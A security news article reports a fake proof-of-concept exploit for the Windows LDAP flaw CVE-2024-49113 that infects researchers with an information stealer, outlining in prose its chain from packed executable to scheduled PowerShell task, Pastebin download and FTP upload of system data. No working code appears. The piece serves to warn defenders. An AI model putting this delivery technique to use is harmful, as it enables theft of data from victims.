Threat actors are distributing information stealer malware masquerading as proof-of-concept (PoC) exploit code targeting a recent Windows Lightweight Directory Access Protocol (LDAP) vulnerability.
Tracked as CVE-2024-49113 (CVSS score of 7.5) and leading to denial-of-service (DoS), the security defect was addressed on December 10 along with over 70 flaws, including a critical LDAP bug (CVE-2024-49112) that could lead to remote code execution (RCE).
Less than a month after patches were rolled out for the two issues, SafeBreach published PoC code targeting CVE-2024-49113, saying that it should be considered as important as the RCE flaw.
According to SafeBreach, which refers to CVE-2024-49113 as LDAPNightmare, the vulnerability can be abused to crash any unpatched Windows server, even those that are not Domain Controllers, if there is an internet-accessible DNS server.
Now, Trend Micro warns of a fake PoC exploit that lures security researchers into executing information stealer malware on their systems.
“Although the tactic of using PoC lures as vehicle for malware delivery is not new, this attack still poses significant concerns, especially since it capitalizes on a trending issue that could potentially affect a larger number of victims,” Trend Micro notes.
The PoC is distributed via a repository forked from the original and replaces the original Python files with an executable packed using UPX.
When executed, the fake PoC drops a PowerShell script in the system’s temporary folder. The script creates a scheduled task that executes an encoded script designed to download another script from Pastebin.
The second script collects system information such as process list, directory list, IP addresses, network adapter information, and install updates, compresses it in a ZIP archive, and uploads it to an external FTP server.
Related: GFI KerioControl Firewall Vulnerability Exploited in the Wild
Related: Major Backdoor in Millions of RFID Cards Allows Instant Cloning
Related: Several Vulnerabilities Found in Popular File Sharing App SHAREit
Related: Researcher Warns 100,000 Devices Still Vulnerable to SMBGhost Attacks
